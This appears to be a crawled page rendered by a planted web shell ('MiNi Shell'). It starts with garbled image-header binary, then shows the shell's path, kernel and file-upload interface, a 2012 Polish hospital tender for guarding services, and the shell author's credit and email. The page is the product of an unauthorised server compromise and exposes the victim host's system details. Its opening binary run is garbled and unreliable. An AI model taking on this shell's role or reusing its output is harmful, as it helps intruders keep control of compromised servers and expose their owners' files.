JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121002/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121002/375602-N-2012.html

<p class="kh_header"><b>Tarnobrzeg: Świadczenie usług w zakresie ochrony osób i mienia dla Wojewódzkiego Szpitala im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu</b><br>
<b>Numer ogłoszenia: 375602 - 2012; data zamieszczenia: 02.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu , ul. Szpitalna 1, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 15 8123208, faks 15 8123209.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie ochrony osób i mienia dla Wojewódzkiego Szpitala im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia: 
Przedmiotem zamówienia jest świadczenie usług w zakresie ochrony osób i mienia  dla Wojewódzkiego Szpitala im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu.
Ochrona osób oznacza działania mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej.
Ochrona mienia oznacza działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu, a także przeciwdziałające powstawaniu szkody wynikającej z tych zdarzeń oraz niedopuszczające do wstępu osób nieupoważnionych na teren ochrony.
II. Opis przedmiotu zamówienia:
1. Kod CPV wg Wspólnego Słownika Zamówień:
79710000-4 Usługi ochroniarskie.
2. Wykaz budynków będących w użytkowaniu Wojewódzkiego Szpitala im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu:

Nazwa budynku  Pow. zabudowy  Pow. użytkowa  Kubatura  Liczba kondygnacji
                                                                                    Nadz., Podz.

Budynek G, G1 Prosektorium, 408,9 m2, 435,64 m2, 2.554,2 m3; 1, 1
Pawilon Diagnostyczny F1, 1.750,0 m2, 5.065,0 m2, 25.326,0 m3, 3, 1
Budynek Administracji Szpitala C, 310,40 m2, 492,14 m2, 2.583,00 m3, 2, 0
Stacja trafo i zespół prądotwórczy W1, 221,3 m2, 185,2 m2, 1.005,0 m3, 1, 0
Pawilon łóżkowy F2 F5, 609,1 m2, 5.510,9 m2, 22.319,0 m3, 9, 1
Tlenownia O, 104,1 m2, 98,2 m2, 490,0 m3, 1, 1
Budynek F3 oraz westybul F, 698,6 m2, 1.186,96 m2, 5.700,74 m3, 1, 1
Pawilon E + X garaże, 1.868,04 m2, 6.799,75 m2, 27.938,14 m3, 3, 1
Budynek Kotłowni ze spalarnią B1, 289,35 m2, 551,60 m2, 2.774,11 m3, 2, 1
Kuchnia szpitalna H, H1, 721,90 m2, 1.928,80 m2, 8.331,70 m3, 3, 1
Pawilon D, D1, D2,1.461,93 m2,  4.499,31 m2, 19.313,93 m3, 3, 1 
z łącznikiem E2, 132,18 m2, 419,93 m2, 1.803,05 m3, 3, 1
Łącznik  E1, 311,43 m2, 938,66 m2, 3.933,00 m3, 3, 1
Tunel  J, J2, 378,3 m2, 265,9 m2, 1.021,0 m3, 0, 1
Tunel J1, 193,1 m2, 144,0 m2, 502,8 m3, 0, 1
Budynek Hydroforni S3, 230,0 m2, 188,20 m2, 1212,6 m3, 1, 0
Śmietnik z pom. betonowania odpadów, 94,2 m2, 64,2 m2, 366,99 m3, 1, 0
Budynek K wraz ze stacją diagnostyczną, garaże, 575,72 m2, 653,63 m2, 3.257,62 m3, 2, 0
Budynek portierni, 26,5 m2, 12 m2, 108 m3, 1, 0
Budynek B, 440,4 m2, 1.334,0 m2, 3.888,5 m3, 3, 1

Powierzchnia całkowita działki w m2  36 367

3. Szczegółowy opis przedmiotu zamówienia.
1) Wykonawcy ubiegający się o świadczenie usługi są zobowiązani spełnić niżej podane uwarunkowania:
a) Zapewnić ochronę całości obiektów z posterunków zlokalizowanych:
Posterunek nr 1 - dyżur na portierni przy bramie wjazdowej w dni robocze, soboty, niedziele i święta od godziny 6:00 do 20:00;
Posterunek nr 2 - dyżurka przy wejściu głównym całodobowo;
Posterunek nr 3 - stanowisko w budynku Szpitalnego Oddziału Ratunkowego w dni robocze, soboty, niedziele i święta  od godziny 19:00 do 7:00 rano dnia następnego.
b) Zapewnić możliwość wsparcia pracowników ochrony działaniami grupy interwencyjnej, która podejmować będzie interwencje na wezwanie upoważnionych pracowników, a czas reakcji grupy interwencyjnej nie przekroczy 5 min.
c) Spełnić wymagania zawarte w ustawie o ochronie osób i mienia z dnia 22 sierpnia 1997 r. (t.j. Dz.U. z 2005 nr 145 poz.1221 z póź. zm.), szczególnie te związane z organizacją pracy, wyposażeniem, umundurowaniem i oznakowaniem pracowników;
d) Zapoznanie się i przestrzeganie przez pracowników ochrony Planu ochrony, aktualnie obowiązującego w Szpitalu.

2) Ochrona obiektów, mienia i osób będzie realizowana w formie bezpośredniej ochrony fizycznej stałej oraz polegającej na stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych. Dozór i ochrona mienia Zamawiającego dotyczy:
a) dozoru i ochrony wewnętrznej obejmującej obiekty, wszystkie pomieszczenia oraz strefy o podwyższonym stopniu ochrony znajdujące się w obiektach;
b) dozoru i ochrony zewnętrznej obejmującej całość posesji na której znajdują się obiekty wraz ze wszystkimi rzeczami ruchomymi i nieruchomymi znajdującymi się na niej;
c) działań zapobiegającym:
kradzieżom i włamaniom;
napadom rabunkowym;
sabotażom;
aktom wandalizmu;
zamachom terrorystycznym,
a także przeciwdziałającym powstaniu szkody wynikającej z tych zdarzeń oraz niedopuszczających do wstępu osób nieuprawnionych na teren chroniony.

3) Zakres obowiązków służby ochrony:
a) pracownicy ochrony zobowiązani są do wykonywania doraźnych zadań i poleceń związanych z zapewnieniem bezpieczeństwa, porządku i ochrony mienia, wydawanych przez Kierownika Zamawiającego lub upoważnionych przez niego pracowników Szpitala.
b) prowadzenia interwencji w przypadku niewłaściwego zachowania osób przebywających w Szpitalu, w tym również na prośbę personelu;
c) utrzymania porządku na drogach wewnętrznych i ciągach komunikacyjnych Szpitala w zakresie organizacji ruchu;
d) udzielania informacji z zakresu organizacji ruchu;
e) ochrona budynków, terenu, mienia szpitalnego znajdującego się w budynkach;
f) czuwanie nad wewnętrznym i zewnętrznym bezpieczeństwem ochranianych obiektów, poprzez nadzorowanie pomieszczeń, ciągów komunikacyjnych celem wczesnego wykrywania ewentualnych awarii i innych zagrożeń;
g) nadzór nad ruchem osób wchodzących do budynków i kierowanie ich do właściwych komórek organizacyjnych;
h) zwracanie uwagi na przedmioty wynoszone ze Szpitala;
i) nie wpuszczanie na teren szpitala i do budynków osób niepożądanych, zakłócających porządek, zachowujących się nie stosownie, wyzywająco i pod wpływem alkoholu;
j) deponowanie kluczy oraz prowadzenie ewidencji w tym zakresie;
k) kontrola obiektów i pomieszczeń po opuszczeniu pracowników na podstawie odrębnego regulaminu,
l) kierowanie ruchem samochodowym na terenie Szpitala;
m) obsługa central pożarowych na posterunku nr 2 (system ostrzegania pożarowego) oraz kontakt ze Strażą Pożarną w przypadku alarmu p-poż.

4) Pracownicy ochrony winni wyróżniać się:
a) właściwymi predyspozycjami psychicznymi i fizycznymi do wykonywania zawodu;
b) szybkim czasem reakcji, umiejętnością analizy sytuacji, szybkim podejmowaniem decyzji;
c) jednolitym umundurowaniem , wraz z plakietką identyfikacyjną i logo firmy;
d) wysoką kulturą osobistą, komunikatywnością. 

5) Posterunki ochrony:
a) Posterunek nr 1- dyżur na portierni przy bramie wjazdowej przy ul. Mickiewicza;
b) Posterunek nr 2 - dyżurka przy wejściu głównym do Szpitala;
c) Posterunek nr 3 -  stanowisko w budynku Szpitalnego Oddziału Ratunkowego;
d) Zleceniodawca udostępni Wykonawcy miejsca, w których zlokalizowane zostaną posterunki, cele umożliwienia wykonywania przedmiotowej usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia, nie spełnia, na podstawie analizy załączonych dokumentów. 

Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca:
1) wykaże, że posiada aktualną koncesję w zakresie ochrony osób i mienia, o której mowa w art. 46 ust. 1 pkt 4 Ustawy z dnia 2 lipca  2004 r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2010 r. nr 220, poz.1447 z póź. zm. oraz art. 15 ust. 1 Ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t.j. Dz. U. z 2005 r., nr 145, poz. 1221 z póź. zm.);
2) złoży oświadczenie - zgodnie z Załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia, nie spełnia, na podstawie analizy załączonych dokumentów.

Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca:
1) dostarczy wykaz co najmniej 3 wykonanych w ciągu ostatnich 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia upływu terminu składania ofert, usług w zakresie ochrony osób i mienia o wartości nie mniejszej niż 180 000 zł brutto każda za okres 12 miesięcy oraz przedstawi 3 dokumenty potwierdzające, że usługi te zostały wykonane należycie;
2) złoży oświadczenie - zgodnie z Załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia, nie spełnia, na podstawie analizy załączonych dokumentów. Potwierdzeniem, że Wykonawca spełnia w/w warunek będzie złożenie oświadczenia - zgodnie z Załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia, nie spełnia, na podstawie analizy załączonych dokumentów.

Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca:
1) wykaże, że dysponuje lub będzie dysponował min. 9 osobami uczestniczącymi w wykonaniu zamówienia, posiadającymi:
- niezbędne kwalifikacje tj.: aktualną licencję pracownika ochrony fizycznej;
- doświadczenie tj.: co najmniej 3 lata pracy jako pracownik ochrony;
oraz przeszkolonymi w zakresie bhp i ppoż.;
2) złoży oświadczenie - zgodnie z Załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia, nie spełnia, na podstawie analizy załączonych dokumentów.

Zamawiający uzna za spełnienie tego warunku, jeżeli Wykonawca:
1) wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i zobowiązuje się do utrzymania tego ubezpieczenia przez okres trwania umowy, z minimalną sumą gwarancyjną w wysokości co najmniej 300 000 zł.;
2)  złoży oświadczenie - zgodnie z Załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane przez Wykonawcę usługi odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca składa następujące dokumenty:
1) Oświadczenie Wykonawcy, że oferowana usługa zapewni możliwość wsparcia pracowników ochrony, działaniami grupy interwencyjnej (w ilości co najmniej 2 osób), która podejmować będzie interwencje na wezwanie upoważnionych pracowników, a czas reakcji grupy interwencyjnej  nie przekroczy 5 min. - zgodnie z Załącznikiem nr 9 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące ofertę - zawartość ofert:
Oferta winna zawierać:
1. Wypełniony i podpisany Formularz Oferty -  na załączniku nr 1 do SIWZ.
2. Wypełniony i podpisany Formularz cenowy -  na załączniku nr 2 do SIWZ.
3. Wykaz posterunków ochrony - na załączniku nr 11 do SIWZ.
4. Pełnomocnictwo w przypadku gdy osoba lub osoby podpisujące ofertę działają na podstawie pełnomocnictwa. Pełnomocnictwo musi być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez: 
1) osobę lub osoby wystawiające pełnomocnictwo lub inną osobę bądź osoby uprawnione do reprezentacji wykonawcy, zgodnie z dokumentem rejestrowym lub  
2) notariusza.
Każda strona załączników do oferty winna być podpisana przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Grupa interwencyjna - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitaltbg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu 
Adres: 39-400 Tarnobrzeg, ul. Szpitalna 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2012 godzina 09:00, miejsce: Wojewódzki Szpital im. Zofii z Zamoyskich Tarnowskiej w Tarnobrzegu 
Adres: 39-400 Tarnobrzeg, ul. Szpitalna 1, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com